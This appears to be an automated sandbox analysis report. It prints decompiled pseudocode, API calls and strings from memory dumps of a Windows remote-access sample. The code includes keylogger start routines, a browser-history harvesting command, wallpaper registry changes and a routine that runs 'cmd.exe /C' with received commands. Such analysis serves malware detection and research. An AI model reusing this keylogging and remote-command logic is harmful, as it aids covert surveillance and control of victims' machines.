                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alloca_probe_16__freea
                                                                                                • String ID: *xA$hpg
                                                                                                • API String ID: 1635606685-3778963461
                                                                                                • Opcode ID: 62589f24e243c4a248a7fedd564adf527f79b85e0f2386475182e05b8b552cab
                                                                                                • Instruction ID: 7156e76f828b6645a92db5cafd045523bd31c128b28bfa575c99f94bcb68196a
                                                                                                • Opcode Fuzzy Hash: 62589f24e243c4a248a7fedd564adf527f79b85e0f2386475182e05b8b552cab
                                                                                                • Instruction Fuzzy Hash: 82413671A10201ABEB20AFA5CC46E6FB7A0BF05710F14456FF904CB290EBBCDC51879A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E0040412E(void* __ebx) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				char _v76;
                                                                                                				char _v100;
                                                                                                				char _v124;
                                                                                                				char _v148;
                                                                                                				char _v172;
                                                                                                				short _v692;
                                                                                                				void* __edi;
                                                                                                				void* _t40;
                                                                                                				struct HINSTANCE__* _t81;
                                                                                                				struct HINSTANCE__* _t84;
                                                                                                				void* _t85;
                                                                                                
                                                                                                				_t48 = __ebx;
                                                                                                				_t81 = 0;
                                                                                                				GetModuleFileNameW(0,  &_v692, 0x104);
                                                                                                				E004020C7(__ebx,  &_v52);
                                                                                                				E004189FF( &_v28, 0x30, E00401F87(E00417A83( &_v76)));
                                                                                                				E00401FB9();
                                                                                                				E00401F87(0x46e1a0);
                                                                                                				E00414D29(E00401EDD(E00403098(_t48,  &_v100, E0040440A(_t48,  &_v124, E004043E6(_t48,  &_v148,  &_v692, 0, E00404260(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				_t84 = 0;
                                                                                                				while(1) {
                                                                                                					_t40 = E00401EDD( &_v28);
                                                                                                					_t80 =  &_v52;
                                                                                                					if(E004183CC(_t40,  &_v52) != 0) {
                                                                                                						break;
                                                                                                					}
                                                                                                					Sleep(0xfa);
                                                                                                					_t84 =  &(_t84->i);
                                                                                                					if(_t84 < 0x14) {
                                                                                                						continue;
                                                                                                					} else {
                                                                                                					}
                                                                                                					L5:
                                                                                                					E00401EE2();
                                                                                                					E00401FB9();
                                                                                                					return _t81;
                                                                                                				}
                                                                                                				E004020DE(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
                                                                                                				_push(0x9d);
                                                                                                				E00404BB7(_t48, 0x46e120, _t80, __eflags);
                                                                                                				_t81 = 1;
                                                                                                				__eflags = 1;
                                                                                                				goto L5;
                                                                                                			}

















                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404148
                                                                                                  • Part of subcall function 00417A83: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040415E), ref: 00417AAA
                                                                                                  • Part of subcall function 00414D29: CloseHandle.KERNEL32(004041D7,?,004041D7,004604D4), ref: 00414D3F
                                                                                                  • Part of subcall function 00414D29: CloseHandle.KERNEL32(004604D4,?,004041D7,004604D4), ref: 00414D48
                                                                                                  • Part of subcall function 004183CC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183E9
                                                                                                • Sleep.KERNEL32(000000FA,004604D4), ref: 0040421A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                • String ID: /sort "Visit Time" /stext "$ F
                                                                                                • API String ID: 368326130-1930567
                                                                                                • Opcode ID: f9f3ba3638950660a3e19d592959a109d22f613aacbdbe36cc78b9c9e0b77167
                                                                                                • Instruction ID: 863f7f6ed9b6a4ba0e83b14e1deb0d35d7da8232c27f4bb5a456acaa0dc9c8f6
                                                                                                • Opcode Fuzzy Hash: f9f3ba3638950660a3e19d592959a109d22f613aacbdbe36cc78b9c9e0b77167
                                                                                                • Instruction Fuzzy Hash: DB31A471A0021957CB14FBB2DC96AED7379AF90308F10017FF606771D2EE38598AC699
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32 ref: 004189F5
                                                                                                  • Part of subcall function 00410AD6: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 00410AE5
                                                                                                  • Part of subcall function 00410AD6: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00410CFC,?,00000000), ref: 00410B0D
                                                                                                  • Part of subcall function 00410AD6: RegCloseKey.ADVAPI32(00000000,?,?,?,00410CFC,?,00000000), ref: 00410B18
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                • API String ID: 4127273184-3576401099
                                                                                                • Opcode ID: 23923dffcd036693881389750fcc9575d6728d19f00af5dc63293092ce265d11
                                                                                                • Instruction ID: ae53d4fe04936d8600cf86c77e97be1cc5f05394fb2188ffd1b7f87bdbcf8586
                                                                                                • Opcode Fuzzy Hash: 23923dffcd036693881389750fcc9575d6728d19f00af5dc63293092ce265d11
                                                                                                • Instruction Fuzzy Hash: A0115E72F8034023D918313A8E1BBBF2816A746B94F61411FFA023A6D6E8DF0D9142DF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E00408778(void* __ecx, char _a4) {
                                                                                                				char _v28;
                                                                                                				char _v32;
                                                                                                				void* _v56;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* _t21;
                                                                                                				void* _t39;
                                                                                                				signed int _t41;
                                                                                                				void* _t43;
                                                                                                
                                                                                                				_t43 = (_t41 & 0xfffffff8) - 0x1c;
                                                                                                				_push(_t21);
                                                                                                				_t39 = __ecx;
                                                                                                				_t2 = _t39 + 0x60; // 0x46e410
                                                                                                				 *((char*)(__ecx + 0x49)) = 1;
                                                                                                				E00409E07(_t2,  &_a4);
                                                                                                				_t47 =  *0x46c9c4 - 0x32;
                                                                                                				_t35 = "Offline Keylogger Started";
                                                                                                				if( *0x46c9c4 != 0x32) {
                                                                                                					E00402076(_t21,  &_v28, "Offline Keylogger Started");
                                                                                                					_t43 = _t43 - 0x18;
                                                                                                					E00417CCA(_t43,  &_v32);
                                                                                                					E0040964B(_t21, _t39, _t47);
                                                                                                					E00401FB9();
                                                                                                				}
                                                                                                				_t44 = _t43 - 0x18;
                                                                                                				E00402076(_t21, _t43 - 0x18, _t35);
                                                                                                				E00402076(_t21, _t44 - 0x18, "i");
                                                                                                				E00417670(_t21, _t35);
                                                                                                				CreateThread(0, 0, 0x408881, _t39, 0, 0);
                                                                                                				if( *_t39 == 0) {
                                                                                                					CreateThread(0, 0, E00408866, _t39, 0, 0);
                                                                                                				}
                                                                                                				CreateThread(0, 0, E00408890, _t39, 0, 0);
                                                                                                				return E00401EE2();
                                                                                                			}













                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00408881,0046E3B0,00000000,00000000), ref: 00408800
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00408866,0046E3B0,00000000,00000000), ref: 00408810
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00408890,0046E3B0,00000000,00000000), ref: 0040881C
                                                                                                  • Part of subcall function 0040964B: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046E3B0), ref: 00409659
                                                                                                  • Part of subcall function 0040964B: wsprintfW.USER32 ref: 004096DA
                                                                                                  • Part of subcall function 0040964B: SetEvent.KERNEL32(00000000,00000000), ref: 00409704
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$EventLocalTimewsprintf
                                                                                                • String ID: Offline Keylogger Started
                                                                                                • API String ID: 3534694722-4114347211
                                                                                                • Opcode ID: 6e56a4a99483b81f26fc6d16ba00d676ec43afe92940d47bb1c87568e2294148
                                                                                                • Instruction ID: 30c56473880c3e9422065a6abdf75e774aa353cf5cd5e57a352aec234575af3c
                                                                                                • Opcode Fuzzy Hash: 6e56a4a99483b81f26fc6d16ba00d676ec43afe92940d47bb1c87568e2294148
                                                                                                • Instruction Fuzzy Hash: 0E119BB15003087AD210B63ACDCADBF3A5CDA81398B40453EF585221D3EEB95D15C6FA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 89%
                                                                                                			E004093D2(void* __ecx) {
                                                                                                				char _v28;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* _t7;
                                                                                                				void* _t18;
                                                                                                				void* _t30;
                                                                                                				void* _t31;
                                                                                                				void* _t32;
                                                                                                
                                                                                                				_t30 = __ecx;
                                                                                                				_t36 =  *((char*)(__ecx + 0x4a));
                                                                                                				if( *((char*)(__ecx + 0x4a)) == 0) {
                                                                                                					_t28 = "Online Keylogger Started";
                                                                                                					 *((char*)(__ecx + 0x4a)) = 1;
                                                                                                					E00402076(_t18,  &_v28, "Online Keylogger Started");
                                                                                                					_t32 = _t31 - 0x18;
                                                                                                					E00417CCA(_t32,  &_v28);
                                                                                                					E0040964B(_t18, _t30, _t36);
                                                                                                					E00401FB9();
                                                                                                					_t33 = _t32 - 0x18;
                                                                                                					E00402076(_t18, _t32 - 0x18, "Online Keylogger Started");
                                                                                                					E00402076(_t18, _t33 - 0x18, "i");
                                                                                                					E00417670(_t18, _t28);
                                                                                                					if( *((intOrPtr*)(_t30 + 0x49)) == 0) {
                                                                                                						if( *_t30 == 0) {
                                                                                                							CreateThread(0, 0, E00408866, _t30, 0, 0);
                                                                                                						}
                                                                                                						CreateThread(0, 0, E00408890, _t30, 0, 0);
                                                                                                					}
                                                                                                					return CreateThread(0, 0, E0040889F, _t30, 0, 0);
                                                                                                				}
                                                                                                				return _t7;
                                                                                                			}












                                                                                                APIs
                                                                                                  • Part of subcall function 0040964B: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046E3B0), ref: 00409659
                                                                                                  • Part of subcall function 0040964B: wsprintfW.USER32 ref: 004096DA
                                                                                                  • Part of subcall function 0040964B: SetEvent.KERNEL32(00000000,00000000), ref: 00409704
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00008866,?,00000000,00000000), ref: 00409452
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00008890,?,00000000,00000000), ref: 0040945E
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000889F,?,00000000,00000000), ref: 0040946A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTime$Eventwsprintf
                                                                                                • String ID: Online Keylogger Started
                                                                                                • API String ID: 3546759147-1258561607
                                                                                                • Opcode ID: 60de90cad66a9d8f035618c7fb2fb3f7ba4be0881d8a7d55411ee6faaa3baa24
                                                                                                • Instruction ID: 5de0d69755c2a9e5944a5a1dc46751dcbc9bef3fcf82e1a3c4b8c65ac349be55
                                                                                                • Opcode Fuzzy Hash: 60de90cad66a9d8f035618c7fb2fb3f7ba4be0881d8a7d55411ee6faaa3baa24
                                                                                                • Instruction Fuzzy Hash: 7F01C8A1A043483ED62076768D8AD7F7A2CDA81398F40047EF685361C7E9B95C4583FA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E00405248(void* __edx) {
                                                                                                				void* __ebx;
                                                                                                				void* __ecx;
                                                                                                				long _t19;
                                                                                                				void* _t24;
                                                                                                				intOrPtr _t28;
                                                                                                				void* _t29;
                                                                                                				void* _t30;
                                                                                                				void* _t31;
                                                                                                				void* _t32;
                                                                                                				intOrPtr _t39;
                                                                                                
                                                                                                				_t29 = __edx;
                                                                                                				_t31 = _t24;
                                                                                                				 *((intOrPtr*)(_t31 + 0x78)) = 0;
                                                                                                				if( *((intOrPtr*)(_t31 + 0x74)) <= 0) {
                                                                                                					L3:
                                                                                                					 *((char*)(_t31 + 0x5c)) = 0;
                                                                                                					_t39 =  *0x46daf7; // 0x0
                                                                                                					if(_t39 != 0) {
                                                                                                						_t33 = _t32 - 0x18;
                                                                                                						E00402076(0, _t32 - 0x18, "Connection Timeout");
                                                                                                						E00402076(0, _t33 - 0x18, "E");
                                                                                                						E00417670(0, _t30);
                                                                                                					}
                                                                                                					E00404F18(_t31, _t29);
                                                                                                					return 1;
                                                                                                				} else {
                                                                                                					goto L1;
                                                                                                				}
                                                                                                				while(1) {
                                                                                                					L1:
                                                                                                					_t19 = WaitForSingleObject( *(_t31 + 0x60), 0x3e8);
                                                                                                					 *((intOrPtr*)(_t31 + 0x78)) =  *((intOrPtr*)(_t31 + 0x78)) + 1;
                                                                                                					_t28 =  *((intOrPtr*)(_t31 + 0x78));
                                                                                                					if(_t19 == 0) {
                                                                                                						break;
                                                                                                					}
                                                                                                					if(_t28 <  *((intOrPtr*)(_t31 + 0x74))) {
                                                                                                						continue;
                                                                                                					}
                                                                                                					goto L3;
                                                                                                				}
                                                                                                				CloseHandle( *(_t31 + 0x60));
                                                                                                				 *(_t31 + 0x60) = 0;
                                                                                                				 *((char*)(_t31 + 0x5c)) = 0;
                                                                                                				SetEvent( *(_t31 + 0x64));
                                                                                                				return 0;
                                                                                                			}














                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405243), ref: 0040525F
                                                                                                • CloseHandle.KERNEL32(?), ref: 004052B6
                                                                                                • SetEvent.KERNEL32(?), ref: 004052C5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                • String ID: Connection Timeout
                                                                                                • API String ID: 2055531096-499159329
                                                                                                • Opcode ID: f7148c9f6f24c60fa663259e72a505c4a84419367b1b05d43e51b382b15f9c92
                                                                                                • Instruction ID: 70729764d5a041a408144c5938078ccf91f98fddcaad8920339c749be8e44bc5
                                                                                                • Opcode Fuzzy Hash: f7148c9f6f24c60fa663259e72a505c4a84419367b1b05d43e51b382b15f9c92
                                                                                                • Instruction Fuzzy Hash: 4B012830A40F40AFE715BB368D4581B7BE4FF41349700057EE18356AF1D6B89440CF5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C13D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2005118841-1866435925
                                                                                                • Opcode ID: 219397f1a8de8ee3dc2d5258062999fed4375ffcb8299db31ba3680be62b4177
                                                                                                • Instruction ID: 0046c4e782e0893ee8a2606df7dc354e42f0520832f7b2da3c93b813be0b6ee8
                                                                                                • Opcode Fuzzy Hash: 219397f1a8de8ee3dc2d5258062999fed4375ffcb8299db31ba3680be62b4177
                                                                                                • Instruction Fuzzy Hash: B301D470540304FEDA10A790C883FBE3354DB10708F14812BBA45791D3EBBC5946CAAE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E004130DD(void* __edx, void* __ebp, void* __eflags, char _a16, char _a60, void* _a84, char _a88, void* _a128, void* _a152) {
                                                                                                				void* _t11;
                                                                                                
                                                                                                				_t41 = __eflags;
                                                                                                				_t11 = E00404260(0,  &_a88, E00401F87(E00401E3B( &_a16, __edx, __eflags, 0)));
                                                                                                				_t35 = L"/C ";
                                                                                                				ShellExecuteW(0, L"open", L"cmd.exe", E00401EDD(E004043E6(0,  &_a60, L"/C ", _t41, _t11)), 0, 0);
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401E66( &_a16, _t35);
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				return 0;
                                                                                                			}





                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041311F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: /C $cmd.exe$open
                                                                                                • API String ID: 587946157-3896048727
                                                                                                • Opcode ID: f338c4e7b7bac6c8d5b47e256eb18be6903d08038c5a7bf254c8e86812f10a86
                                                                                                • Instruction ID: 3fa309dd2515112584df72d140a70bb530d66ccf367d4607847ef92242266621
                                                                                                • Opcode Fuzzy Hash: f338c4e7b7bac6c8d5b47e256eb18be6903d08038c5a7bf254c8e86812f10a86
                                                                                                • Instruction Fuzzy Hash: 16F03B712082055AC204FB72DCD2DBFB398EB90309F50093FF547911E2EF789909865E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 75%
                                                                                                			E00446437(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				unsigned int _v20;
                                                                                                				signed int _v28;
                                                                                                				signed int _v32;
                                                                                                				signed int _v36;
                                                                                                				char _v40;
                                                                                                				intOrPtr _v48;
                                                                                                				char _v52;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* _t86;
                                                                                                				signed int _t92;
                                                                                                				signed int _t93;
                                                                                                				signed int _t94;
                                                                                                				signed int _t100;
                                                                                                				void* _t101;
                                                                                                				void* _t102;
                                                                                                				void* _t104;
                                                                                                				void* _t107;
                                                                                                				void* _t109;
                                                                                                				void* _t111;
                                                                                                				void* _t115;
                                                                                                				char* _t116;
                                                                                                				void* _t119;
                                                                                                				signed int _t121;
                                                                                                				signed int _t128;
                                                                                                				signed int* _t129;
                                                                                                				signed int _t136;
                                                                                                				signed int _t137;
                                                                                                				char _t138;
                                                                                                				signed int _t139;
                                                                                                				signed int _t142;
                                                                                                				signed int _t146;
                                                                                                				signed int _t151;
                                                                                                				char _t156;
                                                                                                				char _t157;
                                                                                                				void* _t161;
                                                                                                				unsigned int _t162;
                                                                                                				signed int _t164;
                                                                                                				signed int _t166;
                                                                                                				signed int _t170;
                                                                                                				void* _t171;
                                                                                                				signed int* _t172;
                                                                                                				signed int _t174;
                                                                                                				signed int _t181;
                                                                                                				signed int _t182;
                                                                                                				signed int _t183;
                                                                                                				signed int _t184;
                                                                                                				signed int _t185;
                                                                                                				signed int _t186;
                                                                                                				signed int _t187;
                                                                                                
                                                                                                				_t171 = __edx;
                                                                                                				_t181 = _a24;
                                                                                                				if(_t181 < 0) {
                                                                                                					_t181 = 0;
                                                                                                				}
                                                                                                				_t184 = _a8;
                                                                                                				 *_t184 = 0;
                                                                                                				E00436267(0,  &_v52, _t171, _a36);
                                                                                                				_t5 = _t181 + 0xb; // 0xb
                                                                                                				if(_a12 > _t5) {
                                                                                                					_t172 = _a4;
                                                                                                					_t142 = _t172[1];
                                                                                                					_v36 =  *_t172;
                                                                                                					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                                                                					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                                                                						L11:
                                                                                                						__eflags = _t142 & 0x80000000;
                                                                                                						if((_t142 & 0x80000000) != 0) {
                                                                                                							 *_t184 = 0x2d;
                                                                                                							_t184 = _t184 + 1;
                                                                                                							__eflags = _t184;
                                                                                                						}
                                                                                                						__eflags = _a28;
                                                                                                						_v16 = 0x3ff;
                                                                                                						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                                                                						__eflags = _t172[1] & 0x7ff00000;
                                                                                                						_v32 = _t136;
                                                                                                						_t86 = 0x30;
                                                                                                						if((_t172[1] & 0x7ff00000) != 0) {
                                                                                                							 *_t184 = 0x31;
                                                                                                							_t185 = _t184 + 1;
                                                                                                							__eflags = _t185;
                                                                                                						} else {
                                                                                                							 *_t184 = _t86;
                                                                                                							_t185 = _t184 + 1;
                                                                                                							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                                                                							__eflags = _t164;
                                                                                                							if(_t164 != 0) {
                                                                                                								_v16 = 0x3fe;
                                                                                                							} else {
                                                                                                								_v16 = _v16 & _t164;
                                                                                                							}
                                                                                                						}
                                                                                                						_t146 = _t185;
                                                                                                						_t186 = _t185 + 1;
                                                                                                						_v28 = _t146;
                                                                                                						__eflags = _t181;
                                                                                                						if(_t181 != 0) {
                                                                                                							_t30 = _v48 + 0x88; // 0x75f68510
                                                                                                							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                                                                                                						} else {
                                                                                                							 *_t146 = 0;
                                                                                                						}
                                                                                                						_t92 = _t172[1] & 0x000fffff;
                                                                                                						__eflags = _t92;
                                                                                                						_v20 = _t92;
                                                                                                						if(_t92 > 0) {
                                                                                                							L23:
                                                                                                							_t33 =  &_v8;
                                                                                                							 *_t33 = _v8 & 0x00000000;
                                                                                                							__eflags =  *_t33;
                                                                                                							_t147 = 0xf0000;
                                                                                                							_t93 = 0x30;
                                                                                                							_v12 = _t93;
                                                                                                							_v20 = 0xf0000;
                                                                                                							do {
                                                                                                								__eflags = _t181;
                                                                                                								if(_t181 <= 0) {
                                                                                                									break;
                                                                                                								}
                                                                                                								_t119 = E00451F80( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                                                								_t161 = 0x30;
                                                                                                								_t121 = _t119 + _t161 & 0x0000ffff;
                                                                                                								__eflags = _t121 - 0x39;
                                                                                                								if(_t121 > 0x39) {
                                                                                                									_t121 = _t121 + _t136;
                                                                                                									__eflags = _t121;
                                                                                                								}
                                                                                                								_t162 = _v20;
                                                                                                								_t172 = _a4;
                                                                                                								 *_t186 = _t121;
                                                                                                								_t186 = _t186 + 1;
                                                                                                								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                                                                								_t147 = _t162 >> 4;
                                                                                                								_t93 = _v12 - 4;
                                                                                                								_t181 = _t181 - 1;
                                                                                                								_v20 = _t162 >> 4;
                                                                                                								_v12 = _t93;
                                                                                                								__eflags = _t93;
                                                                                                							} while (_t93 >= 0);
                                                                                                							__eflags = _t93;
                                                                                                							if(_t93 < 0) {
                                                                                                								goto L39;
                                                                                                							}
                                                                                                							_t115 = E00451F80( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                                                							__eflags = _t115 - 8;
                                                                                                							if(_t115 <= 8) {
                                                                                                								goto L39;
                                                                                                							}
                                                                                                							_t54 = _t186 - 1; // 0xff8bc35f
                                                                                                							_t116 = _t54;
                                                                                                							_t138 = 0x30;
                                                                                                							while(1) {
                                                                                                								_t156 =  *_t116;
                                                                                                								__eflags = _t156 - 0x66;
                                                                                                								if(_t156 == 0x66) {
                                                                                                									goto L33;
                                                                                                								}
                                                                                                								__eflags = _t156 - 0x46;
                                                                                                								if(_t156 != 0x46) {
                                                                                                									_t139 = _v32;
                                                                                                									__eflags = _t116 - _v28;
                                                                                                									if(_t116 == _v28) {
                                                                                                										_t57 = _t116 - 1;
                                                                                                										 *_t57 =  *(_t116 - 1) + 1;
                                                                                                										__eflags =  *_t57;
                                                                                                									} else {
                                                                                                										_t157 =  *_t116;
                                                                                                										__eflags = _t157 - 0x39;
                                                                                                										if(_t157 != 0x39) {
                                                                                                											 *_t116 = _t157 + 1;
                                                                                                										} else {
                                                                                                											 *_t116 = _t139 + 0x3a;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L39;
                                                                                                								}
                                                                                                								L33:
                                                                                                								 *_t116 = _t138;
                                                                                                								_t116 = _t116 - 1;
                                                                                                							}
                                                                                                						} else {
                                                                                                							__eflags =  *_t172;
                                                                                                							if( *_t172 <= 0) {
                                                                                                								L39:
                                                                                                								__eflags = _t181;
                                                                                                								if(_t181 > 0) {
                                                                                                									_push(_t181);
                                                                                                									_t111 = 0x30;
                                                                                                									_push(_t111);
                                                                                                									_push(_t186);
                                                                                                									E00432D80(_t181);
                                                                                                									_t186 = _t186 + _t181;
                                                                                                									__eflags = _t186;
                                                                                                								}
                                                                                                								_t94 = _v28;
                                                                                                								__eflags =  *_t94;
                                                                                                								if( *_t94 == 0) {
                                                                                                									_t186 = _t94;
                                                                                                								}
                                                                                                								__eflags = _a28;
                                                                                                								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                                                								_t174 = _a4[1];
                                                                                                								_t100 = E00451F80( *_a4, 0x34, _t174);
                                                                                                								_t137 = 0;
                                                                                                								_t151 = (_t100 & 0x000007ff) - _v16;
                                                                                                								__eflags = _t151;
                                                                                                								asm("sbb ebx, ebx");
                                                                                                								if(__eflags < 0) {
                                                                                                									L47:
                                                                                                									 *(_t186 + 1) = 0x2d;
                                                                                                									_t187 = _t186 + 2;
                                                                                                									__eflags = _t187;
                                                                                                									_t151 =  ~_t151;
                                                                                                									asm("adc ebx, 0x0");
                                                                                                									_t137 =  ~_t137;
                                                                                                									goto L48;
                                                                                                								} else {
                                                                                                									if(__eflags > 0) {
                                                                                                										L46:
                                                                                                										 *(_t186 + 1) = 0x2b;
                                                                                                										_t187 = _t186 + 2;
                                                                                                										L48:
                                                                                                										_t182 = _t187;
                                                                                                										_t101 = 0x30;
                                                                                                										 *_t187 = _t101;
                                                                                                										__eflags = _t137;
